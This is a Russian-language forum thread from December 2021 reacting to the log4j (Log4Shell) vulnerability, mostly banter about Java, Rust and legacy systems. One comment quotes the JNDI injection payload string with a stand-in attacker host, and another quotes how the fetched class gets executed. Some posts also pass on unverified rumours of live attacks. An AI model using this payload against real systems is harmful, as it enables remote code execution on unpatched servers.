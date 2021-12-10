|
|
|
|2.4, Аноним (4), 09:30, 10/12/2021 [^] [^^] [^^^] [ответить]
|+10 +/–
|
Ну учитывая где используется Java и как там дела с обновлениями, то действительно все печально
|
|2.20, Аноним (20), 10:06, 10/12/2021 [^] [^^] [^^^] [ответить]
|+3 +/–
|
Не так давно пол-США сидели без бензина и мяса когда ломанули оператора трубопроводной сети и оператора сети мясокомбинатов. А на яве написано допупа бизнес-логики.
|
|1.2, Антонио (??), 09:28, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+3 +/–
|
Переполнение буфера, говорили они. Безопасность, говорили они. Позор и срамота.
|
|
|
|2.9, btrfs (?), 09:43, 10/12/2021 [^] [^^] [^^^] [ответить]
|+2 +/–
|
Простите за моё невежество, но как связаны реализация в языке и нечто криво реализованное на этом языке?
|
|
|
|3.11, Аноним (11), 09:49, 10/12/2021 [^] [^^] [^^^] [ответить]
|+8 +/–
|
Есть свидетели того, которые утверждают, что если убрать риски работы с памятью, то всё само наладится, и даже кости выпрямятся.
|
|
|
|4.33, йо (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить]
|+2 +/–
|
Я лично видел как после Rust-a слепой встал и пошёл.
|
|4.39, Аноним (39), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить]
|+/–
|
Простите, но Вы звиздите. Никто из них не утверждал, что прям "всё само наладится". Исчезнут (почти) целые классы ошибок, коих большинство (70-80%), но логические ошибки в архитектуре системы или в реализации бизнес-логики никто не отменял - от прокладки зависит. Но Вы, конечно, припИшете оппонентам и поедание младенцев, хуже не будет, верно?
|
|1.3, Аноним (3), 09:30, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|–4 +/–
|
ага, спасибо. прямо вот только что проснулся и побежал патчить свои Apple iCloud - сервера
|
|1.8, лютый жабби__ (?), 09:43, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|–1 +/–
|
бред какой-то... даже если торчит майнкрафт голой ж в инет, ну запишите в логгер произвольный текст, я посмотрю на ваши успехи )
"Надо срочно переписать на ржаву"
твои мозги )
|
|
|
|
|
|3.19, лютый жабби__ (?), 10:04, 10/12/2021 [^] [^^] [^^^] [ответить]
|+/–
|
>При чем там лютый legacy
ты неправ. слышал, что у немцев можно 6-ку встретить, но в рф 8-11 уже почти везде. у всяких тупкофф-кредитно-пельменные-системы 17 + коклины, скалы, го и прочая смузибень ) уж версию log4j бампнуть не проблема.... хотя для типичного
e.printStackTrace();
данная "уязвимость" имхо неуязвима
|
|
|
|4.37, Онаним (?), 10:43, 10/12/2021 [^] [^^] [^^^] [ответить]
|+/–
|
Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО(tm). И бампнуть там ничего не получится либо потому что все версии библиотек тоже прибиты гвоздями по сертификации, либо потому, что API сменилось 100500 лет назад тому, и говно мамонта просто развалится.
|
|3.34, йо (?), 10:38, 10/12/2021 [^] [^^] [^^^] [ответить]
|+/–
|
Неправда, некоторые банки ещё на COBOL, и планируют перейти на модно-молодёжную Java.
|
|2.27, BratishkaErik (ok), 10:29, 10/12/2021 [^] [^^] [^^^] [ответить]
|+1 +/–
|
Написал в чате > записало в логи > взлом
Проголосовал на мониторинге с NuVotifier > записало в логи > взлом
|
|
|
|2.32, Котофалк (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить]
|+/–
|
Скилл написать небезопасно на каком угодно языке позволяет это преодолеть. И не только это. Тут как нельзя кстати набор поговорок про сломать сдуру, про стеклянный до обеда и иже с ними.
|
|1.16, d (??), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
Давайте все усложним, что бы потом все упростить сложными путями.
|
|1.17, Аноним12345 (?), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
>> Возвращённый сервером атакующего путь будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
Это действительно катастрофа
С системой можно делать все что угодно
Жаба, господа, та самая проприетарная жаба
|
|1.21, Аноним (21), 10:09, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
Да весь код на яве такой дырявый. Чтобы передать стрингу или простейший boolean сразу используют RPC с уродским RMI
|
|1.24, Аноним (24), 10:11, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
Jndi для лога это точно нужная фича которая должна быть включена у всех по умолчанию? Может быть нафиг её?
И вообще сетевые запросы отправлять в логе не выглядит безопасно.
|
|1.29, пох. (?), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
Кстати,поищите у себя в логах appdynamics. Эксплуатируемо или нет - не знаю, но им пользуется половина так называемого цивилизованного мира. Да, оно работает от рута.
Да, конечно же там log4j, где ж его теперь нет.
|
|1.30, Аноним (30), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
У меня вчера stream play на стиме сам без особой причины запустился. И начал двигать мышью и открыл виртуальную клаву Steam. у меня есть основания полагать что уже активно юзают это чудо.
|
|1.35, Онаним (?), 10:40, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
|
> "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу
Макаки конечно везде одинаковые, да...
Это ж надо такую срань в систему логгирования воткнуть.
А вот просто ${var} и передачу var отдельно - ну никак было.
|
|1.40, Аноним (-), 10:49, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
|
По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. Лично перепроверить не решился, так как за такую проверку и посадить могут.
|